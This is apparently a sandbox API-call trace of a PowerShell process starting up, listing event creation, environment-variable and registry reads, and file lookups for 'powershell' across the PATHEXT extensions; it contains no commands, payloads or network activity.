	[0311.551] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398
	[0311.551] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0311.551] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0311.552] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0311.553] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.553] CoTaskMemFree (pv=0x329f30) 
	[0311.555] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0311.556] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ada60 | out: lpMode=0x1ada60) returned 1
	[0311.556] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.557] CoTaskMemFree (pv=0x329f30) 
	[0311.560] SetEvent (hEvent=0x39c) returned 1
	[0311.560] SetEvent (hEvent=0x2e0) returned 1
	[0311.560] SetEvent (hEvent=0x374) returned 1
	[0311.560] SetEvent (hEvent=0x398) returned 1
	[0311.560] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0311.562] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0311.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.562] CoTaskMemFree (pv=0x329f30) 
	[0311.562] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad7b8 | out: phkResult=0x1ad7b8*=0x340) returned 0x0
	[0311.562] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad73c, lpData=0x0, lpcbData=0x1ad738*=0x0 | out: lpType=0x1ad73c*=0x0, lpData=0x0, lpcbData=0x1ad738*=0x0) returned 0x2

Thread:
	id = 72
	os_tid = 0x944


Thread:
	id = 73
	os_tid = 0x9f0


Thread:
	id = 80
	os_tid = 0xa0c


Thread:
	id = 88
	os_tid = 0xa40


Thread:
	id = 94
	os_tid = 0xa24

	[0247.229] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0286.311] CloseHandle (hObject=0x31c) returned 1
	[0286.311] CloseHandle (hObject=0x13) returned 1
	[0286.311] CloseHandle (hObject=0xf) returned 1
	[0286.312] RegCloseKey (hKey=0x308) returned 0x0
	[0286.312] RegCloseKey (hKey=0x304) returned 0x0
	[0286.312] RegCloseKey (hKey=0x300) returned 0x0
	[0286.312] LocalFree (hMem=0x337290) returned 0x0
	[0286.313] RegCloseKey (hKey=0x32c) returned 0x0
	[0286.313] LocalFree (hMem=0x3372c0) returned 0x0
	[0294.233] RegCloseKey (hKey=0x32c) returned 0x0
	[0299.961] RegCloseKey (hKey=0x390) returned 0x0
	[0299.962] RegCloseKey (hKey=0x38c) returned 0x0
	[0299.962] RegCloseKey (hKey=0x388) returned 0x0
	[0299.962] RegCloseKey (hKey=0x384) returned 0x0
	[0299.962] RegCloseKey (hKey=0x380) returned 0x0
	[0299.962] RegCloseKey (hKey=0x37c) returned 0x0
	[0299.963] RegCloseKey (hKey=0x378) returned 0x0
	[0299.963] RegCloseKey (hKey=0x350) returned 0x0
	[0299.963] RegCloseKey (hKey=0x3ac) returned 0x0
	[0299.963] RegCloseKey (hKey=0x3a8) returned 0x0
	[0299.963] RegCloseKey (hKey=0x370) returned 0x0
	[0299.964] RegCloseKey (hKey=0x36c) returned 0x0
	[0299.964] RegCloseKey (hKey=0x368) returned 0x0
	[0299.964] RegCloseKey (hKey=0x364) returned 0x0
	[0299.964] RegCloseKey (hKey=0x360) returned 0x0
	[0299.964] RegCloseKey (hKey=0x35c) returned 0x0
	[0299.965] RegCloseKey (hKey=0x358) returned 0x0
	[0299.965] RegCloseKey (hKey=0x354) returned 0x0
	[0299.965] RegCloseKey (hKey=0x3a4) returned 0x0
	[0299.965] RegCloseKey (hKey=0x344) returned 0x0
	[0299.965] RegCloseKey (hKey=0x340) returned 0x0
	[0299.966] RegCloseKey (hKey=0x33c) returned 0x0
	[0299.966] RegCloseKey (hKey=0x338) returned 0x0
	[0299.966] RegCloseKey (hKey=0x334) returned 0x0
	[0299.966] RegCloseKey (hKey=0x330) returned 0x0
	[0299.966] RegCloseKey (hKey=0x31c) returned 0x0
	[0299.967] RegCloseKey (hKey=0x308) returned 0x0
	[0299.967] RegCloseKey (hKey=0x3a0) returned 0x0
	[0299.967] RegCloseKey (hKey=0x300) returned 0x0
	[0299.967] RegCloseKey (hKey=0x32c) returned 0x0
	[0299.967] RegCloseKey (hKey=0x39c) returned 0x0
	[0299.967] RegCloseKey (hKey=0x398) returned 0x0
	[0299.968] RegCloseKey (hKey=0x374) returned 0x0
	[0299.968] RegCloseKey (hKey=0x3b0) returned 0x0
	[0641.588] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 171
	os_tid = 0xa38


Thread:
	id = 270
	os_tid = 0xdb4

	[0312.113] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0312.116] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0312.121] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.121] CoTaskMemFree (pv=0x329f30) 
	[0312.123] VirtualQuery (in: lpAddress=0x1c77d8e0, lpBuffer=0x1c77e7a0, dwLength=0x30 | out: lpBuffer=0x1c77e7a0*(BaseAddress=0x1c77d000, AllocationBase=0x1bdf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.126] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.126] CoTaskMemFree (pv=0x329f30) 
	[0312.128] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.129] CoTaskMemFree (pv=0x329f30) 
	[0312.131] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.132] CoTaskMemFree (pv=0x329f30) 
	[0312.147] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.147] CoTaskMemFree (pv=0x329f30) 
	[0312.149] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.149] CoTaskMemFree (pv=0x329f30) 
	[0312.150] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.150] CoTaskMemFree (pv=0x329f30) 
	[0312.154] VirtualQuery (in: lpAddress=0x1c77db90, lpBuffer=0x1c77ea50, dwLength=0x30 | out: lpBuffer=0x1c77ea50*(BaseAddress=0x1c77d000, AllocationBase=0x1bdf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.155] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.155] CoTaskMemFree (pv=0x329f30) 
	[0312.157] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.158] CoTaskMemFree (pv=0x329f30) 
	[0312.158] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.158] CoTaskMemFree (pv=0x329f30) 
	[0312.677] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.677] CoTaskMemFree (pv=0x329f30) 
	[0312.681] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0312.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0312.681] CoTaskMemFree (pv=0x329f30) 
	[0313.412] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.412] CoTaskMemFree (pv=0x329f30) 
	[0313.414] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.414] CoTaskMemFree (pv=0x329f30) 
	[0313.416] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.416] CoTaskMemFree (pv=0x329f30) 
	[0313.418] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.418] CoTaskMemFree (pv=0x329f30) 
	[0313.420] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.420] CoTaskMemFree (pv=0x329f30) 
	[0313.421] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.421] CoTaskMemFree (pv=0x329f30) 
	[0313.423] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0313.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.423] CoTaskMemFree (pv=0x329f30) 
	[0314.216] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0314.216] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.216] CoTaskMemFree (pv=0x329f30) 
	[0315.065] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0315.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0315.065] CoTaskMemFree (pv=0x329f30) 
	[0315.068] CoTaskMemAlloc (cb=0x104) returned 0x329f30
	[0315.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x329f30, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0315.068] CoTaskMemFree (pv=0x329f30) 
	[0315.068] CoTaskMemAlloc (cb=0x128) returned 0x327ac0
	[0315.068] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x327ac0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0315.068] CoTaskMemFree (pv=0x327ac0) 
	[0315.722] CoTaskMemAlloc (cb=0x20e) returned 0x1b6f2970
	[0315.722] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b6f2970 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.722] CoTaskMemFree (pv=0x1b6f2970) 
	[0316.156] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.158] SetErrorMode (uMode=0x1) returned 0x1
	[0316.160] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.851] SetErrorMode (uMode=0x1) returned 0x1
	[0324.405] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.406] SetErrorMode (uMode=0x1) returned 0x1
	[0324.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.414] SetErrorMode (uMode=0x1) returned 0x1
	[0324.415] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.415] SetErrorMode (uMode=0x1) returned 0x1
	[0324.416] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.424] SetErrorMode (uMode=0x1) returned 0x1
	[0324.425] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.425] SetErrorMode (uMode=0x1) returned 0x1
	[0324.425] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.434] SetErrorMode (uMode=0x1) returned 0x1
	[0324.435] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.435] SetErrorMode (uMode=0x1) returned 0x1
	[0324.435] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.268] SetErrorMode (uMode=0x1) returned 0x1
	[0325.270] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.270] SetErrorMode (uMode=0x1) returned 0x1
	[0325.270] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.278] SetErrorMode (uMode=0x1) returned 0x1
	[0325.280] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.280] SetErrorMode (uMode=0x1) returned 0x1
	[0325.280] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.288] SetErrorMode (uMode=0x1) returned 0x1
	[0325.290] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.290] SetErrorMode (uMode=0x1) returned 0x1
	[0325.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.219] SetErrorMode (uMode=0x1) returned 0x1
	[0326.221] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.221] SetErrorMode (uMode=0x1) returned 0x1
	[0326.221] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.229] SetErrorMode (uMode=0x1) returned 0x1
	[0326.230] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.230] SetErrorMode (uMode=0x1) returned 0x1
	[0326.230] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.238] SetErrorMode (uMode=0x1) returned 0x1
	[0326.239] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.240] SetErrorMode (uMode=0x1) returned 0x1
	[0326.240] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.247] SetErrorMode (uMode=0x1) returned 0x1
	[0326.249] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.249] SetErrorMode (uMode=0x1) returned 0x1
	[0326.249] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.257] SetErrorMode (uMode=0x1) returned 0x1
	[0326.258] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.258] SetErrorMode (uMode=0x1) returned 0x1
	[0326.259] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.130] SetErrorMode (uMode=0x1) returned 0x1
	[0327.131] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c77d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.131] SetErrorMode (uMode=0x1) returned 0x1
	[0327.131] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c77dac0 | out: lpFindFileData=0x1c77dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.139] SetErrorMode (uMode=0x1) returned 0x1
